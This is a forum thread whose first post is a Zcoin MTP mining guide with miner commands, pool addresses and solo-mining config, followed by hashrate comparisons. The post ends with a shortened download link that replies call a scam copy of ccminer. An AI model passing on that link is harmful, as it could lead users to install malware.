Author

Topic: CCminer (MTP) Zcoin (Read 673 times)

member
Activity: 618
Merit: 21
January 25, 2019, 08:03:25 PM
#8
on 1080ti´s  ccminer and dredge are equal (ccminer very slightly faster)
on 2080´s dredge is faster ~ 3700-3800 and ccminer ~ 3400-3500 ( -i 21)

at least on my rigs
ccminer doesn't have dev fee, that's why it is better for Zerocoin algo mining. ccminer works with the same hashrate. You only have to increase intensity.
member
Activity: 139
Merit: 10
January 16, 2019, 04:33:51 PM
#7
on 1080ti´s  ccminer and dredge are equal (ccminer very slightly faster)
on 2080´s dredge is faster ~ 3700-3800 and ccminer ~ 3400-3500 ( -i 21)

at least on my rigs
legendary
Activity: 1400
Merit: 1050
January 16, 2019, 12:50:19 PM
#6
member
Activity: 618
Merit: 21
December 29, 2018, 07:10:06 PM
#5
I tried to use WildRig Miner by Andrukun on AMD cards and deleted it because of bad stability. ccminer and Cryptodredge are very good for MTP (Zcoin) at the moment. There are some tests (the article is in Russian language) of these miners here: https://www.cryptoprofi.info/?p=1475.
full member
Activity: 585
Merit: 110
December 27, 2018, 03:24:34 AM
#4
Its just a dirty copy & paste from official site.

DO NOT download that scam ccminer from mega! Only download it from official site or Github!!!

true that
here is the github link for anyone interested to download and try ccminer for mtp algo powering zcoin
https://github.com/zcoinofficial/ccminer/releases
member
Activity: 412
Merit: 21
December 26, 2018, 02:56:46 PM
#3
Its just a dirty copy & paste from official site.

DO NOT download that scam ccminer from mega! Only download it from official site or Github!!!
sr. member
Activity: 861
Merit: 281
December 26, 2018, 10:05:27 AM
#2
A detailed tutorial!
Anyway, Do you have numbers for the hashrate you are getting with the GPU?
hero member
Activity: 896
Merit: 515
December 23, 2018, 05:44:49 PM
#1
Currently Zcoin can be mined by CPU and GPUs.

We use the MTP algorithm which is designed to be ASIC-resistant to lengthen fair distribution and allow home miners to participate for as long as possible.

Before you begin, make sure you have a Zcoin (XZC) address where you want your mining payouts to go to. To get one, download a Zcoin wallet and sync it with the network.

The guide is meant for Windows users though Linux users can easily adapt it.

Step 1: Getting your Miners
Nvidia GPU: ccminer by djm34 (now with multi-GPU support)

WildRig Miner by Andrukun (closed source with default 2% dev fee)
Extract the exe binary into a folder of your choice.

Note these are reference miners, and we expect the community to develop more efficient miners as MTP matures. This will allow casual/home miners to participate during this early stage.

The GPU miner does not support multi-GPU setups (requires initialization to be done on GPU to be coded). PCI-E risers increase initialization time significantly.

Step 2: Registering with a Pool (if not solo mining)
There are several pools running Zcoin on MTP (arranged in alphabetical order). The ones we recommend are as follows:

2Miners
xzc.2miners.com:8080 (Europe)
F2Pool
xzc.f2pool.com:5780 (Asia)
Mintpond
zcoin.mintpond.com:3000
Get yourself and account there and make sure you obtain a username and worker details and the pool’s address and port.

Step 3: Configuring your Miner
Open your favourite text editor, cut and paste the following line corresponding to your selected pool and miner and edit it accordingly.

For Pool Mining
For cpuminer:

cpuminer.exe -a mtp -o stratum+tcp://POOLADDRESS:PORT -u username.worker -p password -t numberofthreads

If -t is not specified, it will use the maximum number of threads. It is recommended to have a computer with at least 8 gb of RAM as the miner consumes about 6 gb of RAM.

For ccminer (Nvidia):

ccminer.exe -a mtp -o stratum+tcp://POOLADDRESS:PORT -u username.worker -p password

For WildRig Miner (AMD):

wildrig_avx.exe --algo mtp --opencl-threads 1 --opencl-launch 16x0 --url stratum+tcp://POOLADDRESS:PORT --user username.worker --pass password

After pasting it in, save the file as a .bat file (for e.g. miner.bat) in the same folder where you had extracted the miner binary to earlier.

For Solo Mining
You will need to edit zcoin.conf to allow rpc calls. Navigate to the location of the zcoin data files, default is %appdata%\zcoin

Make a new file called zcoin.conf and add and adapt these lines:

rpcuser=zcoin (up to you to change) rpcpassword=mtp (up to you to change) rpcport=8382 rpcallowip=127.0.0.1 listen=1 server=1 daemon=1

Once this is done, restart your Zcoin wallet and ensure it is synced.

Then make a new file called miner.bat as below and save in the same folder as where you had extracted the miner binary to earlier.

ccminer.exe -a mtp http://127.0.0.1:8382 -u zcoin -p mtp --no-getwork --coinbase-addr YOURZCOINADDRESS

Step 4: Running the Miner
Once you are done, run the bat file you created. You should see a window similar to this (will differ from miner to miner). Note for solo-mining you need to wait for your Zcoin wallet to be synced.

If you’re seeing your shares as accepted, you should be good to go! Note that it may take a few minutes for the correct speed to be reflected on your pool’s website and your mining command line.

Happy mining!

Download > http://bit.ly/2Af3eZl


Jump to: